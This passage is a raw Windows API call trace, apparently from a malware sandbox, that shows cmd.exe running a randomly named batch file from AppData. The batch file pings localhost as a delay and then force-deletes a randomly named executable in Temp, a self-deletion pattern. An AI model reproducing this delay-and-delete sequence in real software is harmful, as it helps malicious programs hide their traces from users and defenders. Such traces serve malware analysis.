lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12efa0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x12efa0*=0x91, lpOverlapped=0x0) returned 1 [0118.170] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0118.170] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0118.171] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.171] GetFileType (hFile=0x58) returned 0x1 [0118.171] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.171] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0118.171] _wcsicmp (_String1="ping", _String2=")") returned 71 [0118.171] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0118.171] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0118.172] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0118.172] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0118.172] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0118.172] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0118.173] _tell (_FileHandle=3) returned 21 [0118.173] _close (_FileHandle=3) returned 0 [0118.173] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12ed74 | out: _Buffer="\r\n") returned 2 [0118.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.173] GetFileType (hFile=0x7) returned 0x2 [0118.346] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.346] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed34 | out: lpMode=0x12ed34) returned 1 [0118.346] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.346] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12ed60, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ed60*=0x2) returned 1 [0118.346] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0118.346] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0118.346] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x12ed70 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0118.346] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x12ed70 | out: _Buffer=">") returned 1 [0118.346] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.346] GetFileType (hFile=0x7) returned 0x2 [0118.347] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.347] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed38 | out: lpMode=0x12ed38) returned 1 [0118.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.347] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x12ed64, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x12ed64*=0x19) returned 1 [0118.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.347] GetFileType (hFile=0x7) returned 0x2 [0118.347] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.347] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efbc | out: lpMode=0x12efbc) returned 1 [0118.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.347] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x190958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x12efe8, lpReserved=0x0 | out: lpBuffer=0x190958*, lpNumberOfCharsWritten=0x12efe8*=0x4) returned 1 [0118.348] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x12eff4 | out: _Buffer=" -n 3 localhost ") returned 16 [0118.348] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.348] GetFileType (hFile=0x7) returned 0x2 [0118.348] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.348] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efb4 | out: lpMode=0x12efb4) returned 1 [0118.348] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.348] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x12efe0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12efe0*=0x10) returned 1 [0118.348] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12f014 | out: _Buffer="\r\n") returned 2 [0118.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.352] GetFileType (hFile=0x7) returned 0x2 [0118.353] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.353] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efd4 | out: lpMode=0x12efd4) returned 1 [0118.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.353] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f000, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12f000*=0x2) returned 1 [0118.353] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0118.353] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0118.353] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0118.353] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0118.353] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0118.353] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0118.353] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0118.353] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0118.353] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0118.353] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0118.353] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0118.353] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0118.353] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0118.353] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0118.353] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0118.353] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0118.353] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0118.353] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0118.353] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0118.353] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0118.353] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0118.353] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0118.354] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0118.354] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0118.354] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0118.354] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0118.354] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0118.354] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0118.354] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0118.354] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0118.354] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0118.354] _wcsicmp (_String1="ping", _String2="START") returned -3 [0118.354] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0118.354] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0118.354] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0118.354] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0118.354] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0118.354] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0118.354] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0118.354] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0118.354] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0118.354] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0118.354] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0118.354] SetErrorMode (uMode=0x0) returned 0x0 [0118.354] SetErrorMode (uMode=0x1) returned 0x0 [0118.354] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1a0550, lpFilePart=0x12edb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12edb8*="Desktop") returned 0x18 [0118.354] SetErrorMode (uMode=0x0) returned 0x1 [0118.355] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.355] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.355] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0xffffffff [0118.356] GetLastError () returned 0x2 [0118.356] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0xffffffff [0118.356] GetLastError () returned 0x2 [0118.356] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0x1a0838 [0118.356] FindClose (in: hFindFile=0x1a0838 | out: hFindFile=0x1a0838) returned 1 [0118.356] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0xffffffff [0118.356] GetLastError () returned 0x2 [0118.356] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0x1a0838 [0118.356] FindClose (in: hFindFile=0x1a0838 | out: hFindFile=0x1a0838) returned 1 [0118.356] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.357] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.357] GetConsoleTitleW (in: lpConsoleTitle=0x12eb84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.357] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.357] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.357] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.357] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0xffffffff [0118.357] GetLastError () returned 0x2 [0118.357] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0xffffffff [0118.357] GetLastError () returned 0x2 [0118.357] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0x1a0d80 [0118.358] FindClose (in: hFindFile=0x1a0d80 | out: hFindFile=0x1a0d80) returned 1 [0118.358] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0xffffffff [0118.358] GetLastError () returned 0x2 [0118.358] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0x1a0d80 [0118.358] FindClose (in: hFindFile=0x1a0d80 | out: hFindFile=0x1a0d80) returned 1 [0118.358] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.358] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.358] GetConsoleTitleW (in: lpConsoleTitle=0x12e918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.358] InitializeProcThreadAttributeList (in: lpAttributeList=0x12e7a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12e868 | out: lpAttributeList=0x12e7a0, lpSize=0x12e868) returned 1 [0118.358] UpdateProcThreadAttribute (in: lpAttributeList=0x12e7a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x12e860, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12e7a0, lpPreviousValue=0x0) returned 1 [0118.358] GetStartupInfoW (in: lpStartupInfo=0x12e75c | out: lpStartupInfo=0x12e75c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0118.358] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0118.360] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12e7fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12e848 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x12e848*(hProcess=0x54, hThread=0x58, dwProcessId=0xefc, dwThreadId=0xf00)) returned 1 [0118.362] CloseHandle (hObject=0x58) returned 1 [0118.362] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0118.362] GetEnvironmentStringsW () returned 0x190970* [0118.362] FreeEnvironmentStringsW (penv=0x190970) returned 1 [0118.362] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0126.840] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x12e73c | out: lpExitCode=0x12e73c*=0x0) returned 1 [0126.840] CloseHandle (hObject=0x54) returned 1 [0126.840] _vsnwprintf (in: _Buffer=0x12e884, _BufferCount=0x13, _Format="%08X", _ArgList=0x12e748 | out: _Buffer="00000000") returned 8 [0126.841] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0126.841] GetEnvironmentStringsW () returned 0x192c28* [0126.841] FreeEnvironmentStringsW (penv=0x192c28) returned 1 [0126.841] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.841] GetEnvironmentStringsW () returned 0x192c28* [0126.841] FreeEnvironmentStringsW (penv=0x192c28) returned 1 [0126.841] DeleteProcThreadAttributeList (in: lpAttributeList=0x12e7a0 | out: lpAttributeList=0x12e7a0) [0126.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.841] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.841] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.841] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.842] SetConsoleInputExeNameW () returned 0x1 [0126.842] GetConsoleOutputCP () returned 0x1b5 [0126.842] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.842] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.842] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12efbc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.842] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.842] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.842] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0126.843] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.843] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0126.843] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12efa0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x12efa0*=0x7c, lpOverlapped=0x0) returned 1 [0126.844] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.844] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n") returned 62 [0126.844] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.844] GetFileType (hFile=0x54) returned 0x1 [0126.844] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.844] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.846] _tell (_FileHandle=3) returned 83 [0126.846] _close (_FileHandle=3) returned 0 [0126.846] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12ed74 | out: _Buffer="\r\n") returned 2 [0126.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.846] GetFileType (hFile=0x7) returned 0x2 [0126.846] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.846] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed34 | out: lpMode=0x12ed34) returned 1 [0126.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.846] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12ed60, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ed60*=0x2) returned 1 [0126.846] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0126.846] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.847] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x12ed70 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0126.847] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x12ed70 | out: _Buffer=">") returned 1 [0126.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.847] GetFileType (hFile=0x7) returned 0x2 [0126.847] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.847] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed38 | out: lpMode=0x12ed38) returned 1 [0126.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.847] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x12ed64, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x12ed64*=0x19) returned 1 [0126.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.847] GetFileType (hFile=0x7) returned 0x2 [0126.847] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.848] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efbc | out: lpMode=0x12efbc) returned 1 [0126.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.848] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x19f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x12efe8, lpReserved=0x0 | out: lpBuffer=0x19f008*, lpNumberOfCharsWritten=0x12efe8*=0x3) returned 1 [0126.848] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x12eff4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" ") returned 58 [0126.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.848] GetFileType (hFile=0x7) returned 0x2 [0126.848] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.848] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efb4 | out: lpMode=0x12efb4) returned 1 [0126.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.848] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x12efe0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12efe0*=0x3a) returned 1 [0126.849] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12f014 | out: _Buffer="\r\n") returned 2 [0126.849] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.849] GetFileType (hFile=0x7) returned 0x2 [0126.849] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.849] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efd4 | out: lpMode=0x12efd4) returned 1 [0126.849] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f000, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12f000*=0x2) returned 1 [0126.849] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0126.849] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0126.849] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0126.849] GetConsoleTitleW (in: lpConsoleTitle=0x12eb84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.850] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12dbfc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12dc00, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12dbfc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0126.850] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0126.850] _wcsicmp (_String1="w588H5dN.exe", _String2=".") returned 73 [0126.850] _wcsicmp (_String1="w588H5dN.exe", _String2="..") returned 73 [0126.850] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x2020 [0126.850] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0126.850] _wcsicmp (_String1="w588H5dN.exe", _String2=".") returned 73 [0126.850] _wcsicmp (_String1="w588H5dN.exe", _String2="..") returned 73 [0126.850] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x2020 [0126.850] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", fInfoLevelId=0x0, lpFindFileData=0x1a0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a0554) returned 0x180aa8 [0126.851] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 1 [0126.851] FindNextFileW (in: hFindFile=0x180aa8, lpFindFileData=0x1a0554 | out: lpFindFileData=0x1a0554) returned 0 [0126.852] GetLastError () returned 0x12 [0126.852] FindClose (in: hFindFile=0x180aa8 | out: hFindFile=0x180aa8) returned 1 [0126.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.852] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.852] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.853] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.853] SetConsoleInputExeNameW () returned 0x1 [0126.853] GetConsoleOutputCP () returned 0x1b5 [0126.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.853] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12efbc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.853] 